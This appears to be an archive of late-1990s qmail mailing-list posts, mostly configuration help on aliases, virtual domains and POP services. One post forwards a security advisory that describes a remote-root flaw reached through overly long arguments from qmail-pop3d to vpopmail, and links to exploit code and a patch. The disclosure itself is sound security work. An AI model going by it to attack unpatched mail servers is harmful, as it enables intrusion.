Sounds like it's time to modify your /etc/inetd.conf or tcpserver and add strace and make sure you dont have any typos. On Thu, 3 Feb 2000, Mullen, Patrick wrote: I don't recognize "shell-init", but it's not part of qmail. Well, after grinding the heck out of my hard drive, I finally found both "shell-init" and "could not get current directory" in the same program. As should have been expected, they were from /bin/bash (and /bin/sh which is only a symbolic link to /bin/bash on RH6.1). Where and why would bash be called while connecting to qmail-pop3d, and what would cause it to not be able to get the current directory? ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 6:10pm up 10 days, 2:07, 3 users, load average: 0.00, 0.09, 0.14
remote root qmail-pop with vpopmail advisory and exploit with patch (fwd)
___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 8:00pm up 185 days, 6:19, 4 users, load average: 0.08, 0.12, 0.15 -- Forwarded message -- Date: Sat, 22 Jan 2000 16:04:51 -0800 From: what's your style? [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: remote root qmail-pop with vpopmail advisory and exploit with patch w00w00 Security Advisory - http://www.w00w00.org/ Title: qmail-pop3d with vpopmail/vchkpw Platforms: Any Discovered: 7th January, 2000 Local: Yes. Remote: Yes. Author: K2 [EMAIL PROTECTED] Vendor Status: Notified. Last Updated: N/A 1. Overview qmail-pop3d may pass an overly long command argument to it's password authentication service. When vpopmail is used to authenticate user information a remote attacker may compromise the privilege level that vpopmail is running, naturally root. 2. Background It is Qmail's nonconformance to the pop3 specification that allows this bug to manifest itself. qmail-pop3d trust's that it's checkpassword mechanism will support the same undocumented "features" as it dose, it is this extra functionality that breaks vpopmail and RFC1939. From RFC1939 [Post Office Protocol - Version 3] Commands in the POP3 consist of a caseinsensitive keyword, possibly followed by one or more arguments. All commands are terminated by a CRLF pair. Keywords and arguments consist of printable ASCII characters. Keywords and arguments are each separated by a single SPACE character. Keywords are three or four characters long. Each argument may be up to 40 characters long. From BLURB3 (qmail-1.03) POP3 service (qmail-popup, qmail-pop3d): * RFC 1939 * UIDL support * TOP support * APOP hook * modular password checking (checkpassword, available separately) 3. Issue qmail-pop3d claims compliance to RFC1939, however this is not the case qmail breaks that compliance by allowing overly long argument lengths to be processed. qmail then passes control to a process without documenting this added bug/feature. 4. Impact A remote attacker may attain the privilege level of the authentication module. Sample exploit code can be found at http://www.ktwo.ca/security.html 5. Recommendation Impose the 40 character limitation specified by RFC1939 into qmail. Apply qmail-popup patch http://www.ktwo.ca/c/qmail-popup-patch 6. References RFC1939 qmail-1.03/BLURB3 K2 www.ktwo.ca / [EMAIL PROTECTED]
Re: Good patches to apply to new installations?
On Mon, 17 Jan 2000, Niall R. Murphy wrote: I personally use vanilla qmail. It is -not- necessary to patch it. I was under the impression bigdns allowed qmail to send to sites that it would otherwise have problems resolving MX for? Niall This problem is very picky about the machines it crops up on. Some people claim that linux has this problem, while both of my linux systems do not have the patch and have never had an issue. The LWQ mail page goes into detail with a description of the problem, and really, the only advice is to check your log files often and if you see the problem, then patch. If it aint broke, dont fix it. Also (i havent verified this) but i have heard that AOL recently is under the byte limit, so this may no longer be a problem (but there might be others not under the limit, who knows) ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 10:50am up 178 days, 21:09, 5 users, load average: 0.09, 0.20, 0.16
Mail?
Has anyone else seen a MAJOR decline in qmail related mail since the DNS 'switchover' -- is it just me? ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 3:50pm up 173 days, 2:09, 5 users, load average: 0.16, 0.25, 0.23
RE: Sendmail vs Qmail?
Another thing. If something DOES have a security hole in it, ie. qmail and sendmail at the same time, i can pretty much guarantee you that since sendmail is on the larger percentage of machines it will be the first one that the scr1pt k1ddez target and exploit. (the modularity of qmail makes it much more secure then a single bloated program running as root) Qmail has been proven to be a more robust solution. IMHO qmail is easier to learn and just makes much more sense. The qmail list ROCKS :) What more could you ask for? On Thu, 16 Dec 1999, Matthew Brown wrote: Does Sendmail have any advantages over qmail? I'm trying to convince people to switch to qmail, but they're view is: Everyone uses sendmail, so we should too. Sendmail's biggest advantage is that pretty much every UNIX admin has at least a passing familiarity with it. It's better known, at least as far as the simple stuff goes. It's always going to be harder to find someone with qmail expertise. There are a couple of ways that sendmail is easier to configure than qmail. They're overweighed by all the ways that qmail is easier to configure than sendmail is, IMHO. -Matt -- Matt Brown UNIX Administrator tickets.com Phone: (714) 327-5571 --- Email: [EMAIL PROTECTED] ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 4:45pm up 147 days, 3:04, 4 users, load average: 0.10, 0.20, 0.17
Re: Need help with direction to go (long)
Change that to "use the absolute latest version of NON BETA code available. ie. 2.53 (i believe)" An exploit just came out for the beta tree, dont know if they have a patch available to fix it yet tho'... On Thu, 9 Dec 1999, Markus Stumpf wrote: On Thu, Dec 09, 1999 at 12:44:33PM -0500, Vince Vielhaber wrote: Since you're using mbox format, qpopper's probably your best bet. There's a patch on www.qmail.org for home dir mailboxes, and in ver3.0 (currently in beta) it will be part of the distribution. Just and additional note: you should make abolutely sure that you use the latest version of qpopper. Previous versions are vulnerable to a buffer overflow and a exploit script has been posted to the bugtraq list. \Maex -- SpaceNet GmbH | http://www.Space.Net/ | Stress is when you wake Research Development| mailto:[EMAIL PROTECTED] | up screaming and you Joseph-Dollinger-Bogen 14 | Tel: +49 (89) 32356-0| realize you haven't D-80807 Muenchen | Fax: +49 (89) 32356-299 | fallen asleep yet. ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 11:10am up 139 days, 21:29, 4 users, load average: 0.03, 0.09, 0.11
Re: mx on machine but machine should no treat it as local
On Sun, 14 Nov 1999, Markus Wuebben wrote: Hi! Imagine this. You have a proxy and that proxy is mx for a couple of domains but that proxy should not treat any mail as local. All mail should be routed to a mailserver that is behind the proxy in a private network. How would I do that without using maildir2smtp. I know I can use the smtproutes but prior to that I need to make sure that mails are not treated as local. As we all know, if I have an MX on that proxy for a certain domain but it is not listed in locals or virtualdomains I will get "Although I am listed as best MX for that" How can I avoid that? put the domain in rcpthosts on the mx machine, but make sure you dont put it in the locals file, it's really that simple :) ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 6:00am up 114 days, 16:19, 4 users, load average: 0.51, 0.72, 0.74
Re: URGENT: QMAIL problems!!! :(((
Qmail changes all dots to the : character ':' -- you might want to search all the documentation, including the LWQ (life with qmail) home page. It has what you need. http://web.infoave.net/~dsill/lwq.html#dots-in-extensions specifically :) On Mon, 23 Aug 1999, Dmitry Niqiforoff wrote: Hello! Yesterday I moved from sendmail to qmail and now I got a problem. The problem is it doesn't recognizes usernames with dots in it. For example, there is a user "[EMAIL PROTECTED]", and qmail can not deliver a message to him: [EMAIL PROTECTED]: Sorry, no mailbox here by that name. (#5.1.1). Is there a way to force qmail to process messages for such users correctly? Regards, Dmitry Niqiforoff [tel. +7 8462 427427] Kraft-S, Ltd. Samara, Russia ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 12:20am up 31 days, 9:13, 3 users, load average: 0.00, 0.06, 0.10
failure notice (fwd)
Has anyone patched either of these programs to work with each other? ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 11:00am up 27 days, 19:53, 3 users, load average: 0.00, 0.07, 0.08
SQWebmail and vmailmgrd..
Doh, that's what i get for forwarding a bounce. Anyway, has anyone patched sqwebmail and vmailmgrd and got them working together properly? On Thu, 19 Aug 1999, John Gonzalez/netMDC admin wrote: Has anyone patched either of these programs to work with each other? ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 11:05am up 27 days, 19:58, 3 users, load average: 0.18, 0.14, 0.10
Re: question about ip hosts and virtual hosts
sure, very very simple. Make sure that the virtual domains are in the /var/qmail/control/virtualdomains file, and NOT in the locals file. Make a user on the box called 'user1' Now, in your /var/qmail/control/virtualdomains file, have this: www.virtualdomain1.com:alias-virtualdomain1 www.virtualdomain2.com:alias-virtualdomain2 in the /var/qmail/alias directory, create files named: .qmail-virtualdomain1-webmaster inside that file, put [EMAIL PROTECTED] and the mail for [EMAIL PROTECTED] will be forwarded to him. You can do this with any address you want @virtualdomainX.com On Sun, 8 Aug 1999, steve j. kondik wrote: i've scoured the documentation and haven't figured out how to do this yet.. here is my situation.. my box has several ips, lets say domain1.com and domain2.com as well as some normal vpops, which work fine. now here is the problem, mail for [EMAIL PROTECTED] should go to user1 and mail for [EMAIL PROTECTED] should go to user2, now, both domain1 and domain2 are on the same box, using ip aliasing and all the users who recieve mail for these 2 domains have real shells on the box. is this possible without running multiple instances of qmail for each ip? this is probably easy, im just missing something here. thanks in advance, -steve ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 11:55pm up 16 days, 8:48, 3 users, load average: 0.00, 0.05, 0.07
Re: unable to bind
After you commented out the sendmail line in your inetd.conf file, you made sure that you also killed the sendwhale process as well, didnt you? ps auxw | grep sendmail should show you whats running. Also there is a utility that can tell you what program is using what port, but i cant think of the name right now. On Sat, 31 Jul 1999, Robert wrote: Hello, I recently install qmail on a BSDI 4.01 server, and I'm having a really bad time trying to get it running. I read the HOWTO located here http://www.flounder.net/qmail/qmail-howto.html#10 I did everything as explained, but I'm getting this error in /var/log/qmail/qmail-smtpd: xx.xxx tcpserver: fatal: unable to bind: address already used I dug through the archives and found someone having the same problem, but there were no real answers as to why it was happening. I commented out anything referring to SMTP,POP,POP3,port 25 or 110 in inetd.conf. I also ran netstat to see if there was anything using the ports, and there doesn't appear to be. I even went as far as to comment out the reference to SMTP in /etc/services thinking it may somehow reserve that port for sendmail. I knew this couldn't be the case, but I'm getting desperate at this point. Has anyone ever had this problem and actually corrected it? Any help would be greatly appreciated!! Please let me know if I'm missing something. Thank you, Robert ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 3:45pm up 9 days, 38 min, 3 users, load average: 0.02, 0.09, 0.08
Re: Trying to achieve maximum speed!
On Tue, 13 Jul 1999 [EMAIL PROTECTED] wrote: I just sent out 300 messages using qmail-remote in about 4 seconds. *sigh*, qmail remote is fast, but you have to pass it information like you state below, such as the prefer MX host, which over course a simple perl wrapper could find, but well... I still remember qmail being very fast on other servers. Why isn't my concurrentremote filling up? I see in logs an average of 1-3/75 and that's it. -jeremy You'd be better off doing a couple other things with your time (rather then whining here) 1.) Look at qmail-inject, and see if that can help you test the machine for proper delivery statistics (might also look into getting qmail-analog) 2.) See if it's possible to use qmail-inject with their java system A. If it's not possible, then try convincing the higher ups that the system needs to be modified by doing the following: 1.) Show them how much faster an untuned qmail installation can be over their "custom" setup. 2.) Show them the benefits of the modularity of qmail, and how easily it can be modified to do what they want. (there are people on this list that will contract themselves to custom write anything you need, i'm sure russ can help you out, he's a genius when it comes to qmail (among other things)) ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 1:50pm up 158 days, 20:53, 2 users, load average: 1.09, 0.35, 0.17
Re: Trying to achieve maximum speed!
On Tue, 13 Jul 1999 [EMAIL PROTECTED] wrote: Well, I'm not really whining. I realize there are things that I'm limited by and unfortunately the people in charge don't really understand, but I'd still like to try and optimize where I can. I'm willing to accept that there's nothing I can do. I just want to be sure. Right now as it stands, calling external program is pointless because like I said, their nice program communicates directly with smtp. They said this is to have platform portability. I understand that I guess, but why since it is running on a Unix machine. Maybee i'm confused. Can you please explain to me what: "communicates directly with smtp" means? ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 2:10pm up 158 days, 21:13, 2 users, load average: 0.00, 0.06, 0.10
Re: Trying to achieve maximum speed!
So your saying that their cute little java program in no way uses an MTA, and that it contacts the remote MTA of the recipients server directly. If that's the case, i dont see why you even have qmail installed on the server? You are tuning for outbound performance, but according to you their java server: "communicates directly with smtp" which means that no MTA will ever get called to do outbound SMTP. On Tue, 13 Jul 1999 [EMAIL PROTECTED] wrote: SMTP is a port on your computer. Port 25. The program uses socket functions to connect to this port to do its work instead of shelling out and calling something like /usr/sbin/sendmail. Therefore this makes it difficult to have the program call qmail-inject or qmail-remote if it never calls external programs in the first place. -jeremy Maybee i'm confused. Can you please explain to me what: "communicates directly with smtp" means? ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 2:10pm up 158 days, 21:13, 2 users, load average: 0.00, 0.06, 0.10 http://www.xxedgexx.com | [EMAIL PROTECTED] - Y2K. We're all gonna die. ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 2:20pm up 158 days, 21:23, 2 users, load average: 0.11, 0.21, 0.18
RE: Perhaps I missed it the first time ...
On Tue, 29 Jun 1999, Alex Miller wrote: My expectation is that my security needs in conjunction with internet services will be very high, so I WANT to hear the horror stories. Other peoples problems are my problems. Alex (my brain hurts from reading so many words) Miller You may want to hear his horror stories, but I sure as hell dont, and it's off topic for this list. you need to subscribe to the following: hack-track bugtraq cert among others. ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 11:05am up 144 days, 18:08, 3 users, load average: 0.22, 0.17, 0.10
RE: Perhaps I missed it the first time ...
On Tue, 29 Jun 1999, Scott D. Yelich wrote: On Tue, 29 Jun 1999, Alex Miller wrote: And why SHOULD anyone care about your hacker troubles, and your lack of a firewall, and your overwhelming email traffic? Would you like someone to read your email to you, or build you a firewall? Well, I certainly do. He seemed to describe already having "4 redundant firewalls" whatever that means. John from NM doesn't want to hear about off topic cracker headaches. It's ok, John, they'll be coming your way soon enough. I'm sure he is aware of Rt 66 and the happy hacker. It's lame when you call an ISP for weeks wondering why you can't get your email or something and all they will tell you is that they're doing maintenance or upgrades and it will be back real soon now -- when the truth is they've been cracked. much snipped for brevity It really doesnt matter what i want to hear about or not. That's not what this list is about. I dont care that he has been hacked 1,000,000 times by 1,000,000 different hackers. I dont care if he has 1,000,000 different redudant firewalls all in a row. I dont care if 1,000,000 different credit card numbers were stolen from an ISP. They are off topic for this list. If you want to shoot private messages back and forth, fine with me, but please dont drag the rest of the list in with you. This is a qmail list, not a hack-track list, not a firewall help list. There are appropriate places for discussion of those topics, and they exist so you dont have to discuss those on lists where it is inappropriate. This really isnt rocket science, or am i just that far off the deep end? ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 5:45pm up 145 days, 48 min, 3 users, load average: 0.07, 0.07, 0.08
RE: Perhaps I missed it the first time ...
On Tue, 29 Jun 1999, Scott D. Yelich wrote: Well, now we certainly are off topic. John -- I talk in many forums. It seems each has its own designs on what is appropriate and what is not. Many forums, the want to know *why* you are doing something, in case they can point out better or alternative ways or second guess what you are intending to do. Other forums, they only want the cut'n'dry, yet, if you don't give enough information, then there is a flurry of chatter about elaboration. You didnt address anything i said. What does that have to do with qmail, and this list? Many people on this list have been sending me private messages and I have truly appreciated the dialogues. I'm trying to remember, but I think I met one of my best contacts regarding these kiddies from this list. Scott I'm afraid i completely dont understand this paragraph? What is it that you are trying to say? Who called the list kiddies? I'm not trying to win a pissing contest here, but i felt that it needed to be said that the discussion that is going on, is way off topic. Now we have wandered off even farther, this will be my final post in this thread. ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 6:00pm up 145 days, 1:03, 3 users, load average: 0.26, 0.20, 0.14
Re: Qmail latency ?
That is definetly not the default behaviour of qmail. When i send a message (in pine for example) to another host, it gets delivered immediately. Usually before i can even exit the program and do a netstat it's already been delievered. On Thu, 3 Jun 1999, Emmanuel Mogenet wrote: Everything is OK except for a minor detail: delivery latency. ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 11:05am up 118 days, 18:08, 3 users, load average: 0.00, 0.03, 0.02
Re: Mailing lists on dial-up box
On Fri, 28 May 1999, Frederik Lindberg wrote: qmail isn't made for dialups. Use the serialmail package for remote mail instead. Local delivery with qmail and all remote mail goes to a Maildir from where it is sent to the smarthost via serialmail. SMTP itself really isnt optimized for dialup, it's not just qmail. There are tons of ways to run a more efficient mailer from a dialup box without using SMTP or even serialmail. qmtp is an option Bruce Guenter has a nullmailer package that might be of some use. ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 5:40pm up 113 days, 43 min, 3 users, load average: 0.13, 0.17, 0.18
Re: Mailing lists on dial-up box
I dont see why this is necessary. Have you ever heard of virtual hosts? Mail exchangers? POP boxes? Virtual Domains? etc, etc? It might help us to better help you, if you explain the entire situation? On Fri, 28 May 1999, Doug Lumpkin wrote: I realize there might be better ways to do this, but none of their machines are connected to the internet, only the gateway machine is. So it has to be running SMTP to accept their messages and then direct them out onto the net... -- Doug Lumpkin [EMAIL PROTECTED] John Gonzalez/netMDC admin wrote: On Fri, 28 May 1999, Frederik Lindberg wrote: qmail isn't made for dialups. Use the serialmail package for remote mail instead. Local delivery with qmail and all remote mail goes to a Maildir from where it is sent to the smarthost via serialmail. SMTP itself really isnt optimized for dialup, it's not just qmail. There are tons of ways to run a more efficient mailer from a dialup box without using SMTP or even serialmail. qmtp is an option Bruce Guenter has a nullmailer package that might be of some use. ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 5:40pm up 113 days, 43 min, 3 users, load average: 0.13, 0.17, 0.18 -- Doug Lumpkin PacInfo Internet [EMAIL PROTECTED] ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 6:00pm up 113 days, 1:03, 3 users, load average: 0.02, 0.09, 0.12
Re: Random Qmail Questions
On Thu, 27 May 1999 [EMAIL PROTECTED] wrote: Pine only groks mailboxes, so maildir2mbox moves the messages from a maildir to an mbox for Pine's benefit. In the longer run, consider running an IMAP server that handles maildirs. I realized that it didn't like Maildir, but I thought you could set what file it used as it's mbox by setting the MAILTMP variable. I've got my MAILTMP set as something else entirely, yet it insists on using Mailbox. Why would I want to set up an IMAP server? I don't currently have one running. The way I see it, the less open ports I've got, the better. You may actually want to examine the pinq script to see how it's coded. As for running an IMAP daemon, i honestly dont see why you would want to do that either. You can choose pop or imap, but running both only allows you to service a market where people prefer IMAP over POP, which is rare. The pop daemon that DJB wrote for maildir works beautifully, is simple, fast, secure, and what more can you ask for? OH, of course it's free too :) and you probably already have it if you have qmail running. That's a feature, qmail doesn't want to run as root which it would have to do. Use ~alias/.qmail-root to send root's mail somewhere else. Ah thank you. I knew I had forgotten to ask something. I aliases work under qmail. I've got some aliases under people's home directories, so they can accept mail from other addresses, but I haven't figured out how the ~alias/.qmail-x works. Do I need to put the address to forward to in the /.qmail-root file? Is it as simple as that? No, you need to read the documentation. This is really a much larger question then can be answered here, but here are the relevant places to look: http://web.infoave.net/~dsill/lwq.html and specifically: http://web.infoave.net/~dsill/lwq.html#Aliases People say nice things about mutt. The rest of us make do with worthless unreliable MUAs. Glad you brought up mutt. I've been wanting to switch to it for some time now. Unfortunately I haven't found an editor that works with it too well. It was using vi, but vi seems to forget to wrap the text, so it sends everything on this one long line. I tried using pico as well, but it sits there and asks me what file I want to save it as etc., which is just a pain. BTW, does mutt use Maildir, or will I have to set up a mutq filter for it as well? I believe that any recent version of mutt has maildir support natively. More reliable than the things they replace. Dan's definition of beta is along the lines of "not known to be bug-free" rather than the more popular "runs well enough that maybe the users will debug it for us." Like most bits of qmail, tcpserver is really nice once you believe that it really is fast and nail down its typical three-mile long command line. Thanks, I'm into anything that'll save me some memory and a few CPU cycles. I'll have to give them a try. Regards, Jason You'll find this is pretty much normal. DJB's "beta" or even "alpha" software is usually much higher quality then the normal "beta" package. I have much faith in DJB's coding skill. ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 10:15pm up 112 days, 5:18, 4 users, load average: 0.06, 0.14, 0.11
Re: Multiple Domains with Aliases
On Wed, 19 May 1999, Michael wrote: I am sorry if this has been touched on before, but after going through a plethora of messages, I have been unable to find what I am looking for. np, were here to help =) I am trying to set up multiple domains with multiple aliases. For example: Joe B. has a login of joeb and an email address of - [EMAIL PROTECTED] Yet Joe H. has a login in as joeh and an email address of - [EMAIL PROTECTED] . This is very very simple to do. What you want to do is set up your virtual domains like normal, and make sure neither domain is in the 'locals' file, that way the /var/qmail/alias directory is to be checked. Add an acocunt for joeb Add an account for joeh on the machine locally, or on any other machine that you plan to have them check pop mail from. Now, in the /var/qmail/alias directory, create two files. .qmail-foo-joe containing: [EMAIL PROTECTED] and .qmail-foobar-joe [EMAIL PROTECTED] Make sure that you add these domains to the virtualhosts file too. I am able to set alias so that Any mail sent to joe at any domain will go to whoever I choose. I just can not get it to where I can have the same alias name with different domains and still keep the mail separated. I am currently using the .qmail-joe format for my alias forwards and then put in the addresses that accept that mail. How do I set it up so that the mail for the joe alias from the domain foo.com only goes to the joeb account Any help is greatly appreciated as I am pulling hair out on this one. Sincerely, Michael Hamson ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 10:00pm up 104 days, 5:03, 3 users, load average: 0.00, 0.06, 0.07
Re: Multiple Domains with Aliases
works fine for me. Would you be willing to give me a shell account on the machine so i can verify your settings? What bounce shows up? Did you make sure to put the domain in the 'virtualdomains' file? Did you kill -HUP the qmail-send daemon? Do the local counts exist? On Wed, 19 May 1999, Michael wrote: hmmm... we tried your steps.. but seem the mail bounces if we do not have our locals sigh we have been mussing with this for the last two months (sad to say) and have tried everything that we have and even tried to experiment we almost think its a bug but that does not seem likely since it works for other people. -Michael - Original Message - From: John Gonzalez/netMDC admin [EMAIL PROTECTED] To: Michael [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Wednesday, May 19, 1999 9:03 PM Subject: Re: Multiple Domains with Aliases On Wed, 19 May 1999, Michael wrote: I am sorry if this has been touched on before, but after going through a plethora of messages, I have been unable to find what I am looking for. np, were here to help =) I am trying to set up multiple domains with multiple aliases. For example: Joe B. has a login of joeb and an email address of - [EMAIL PROTECTED] Yet Joe H. has a login in as joeh and an email address of - [EMAIL PROTECTED] . This is very very simple to do. What you want to do is set up your virtual domains like normal, and make sure neither domain is in the 'locals' file, that way the /var/qmail/alias directory is to be checked. Add an acocunt for joeb Add an account for joeh on the machine locally, or on any other machine that you plan to have them check pop mail from. Now, in the /var/qmail/alias directory, create two files. .qmail-foo-joe containing: [EMAIL PROTECTED] and .qmail-foobar-joe [EMAIL PROTECTED] Make sure that you add these domains to the virtualhosts file too. I am able to set alias so that Any mail sent to joe at any domain will go to whoever I choose. I just can not get it to where I can have the same alias name with different domains and still keep the mail separated. I am currently using the .qmail-joe format for my alias forwards and then put in the addresses that accept that mail. How do I set it up so that the mail for the joe alias from the domain foo.com only goes to the joeb account Any help is greatly appreciated as I am pulling hair out on this one. Sincerely, Michael Hamson ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ \ __/_ __ `__ \/ __ /_ ___/ MDC Computers/netMDC! _ / / / `__/ /_ / / / / / / /_/ / / /__ (505)437-7600/fax-437-3052 /_/ /_/\___/\__/ /_/ /_/ /_/\__,_/ \___/ http://www.netmdc.com [-[system info]---] 10:00pm up 104 days, 5:03, 3 users, load average: 0.00, 0.06, 0.07 ___ _ __ _ __ /___ ___ /__ John Gonzalez/Net.Tech __ __ \ __ 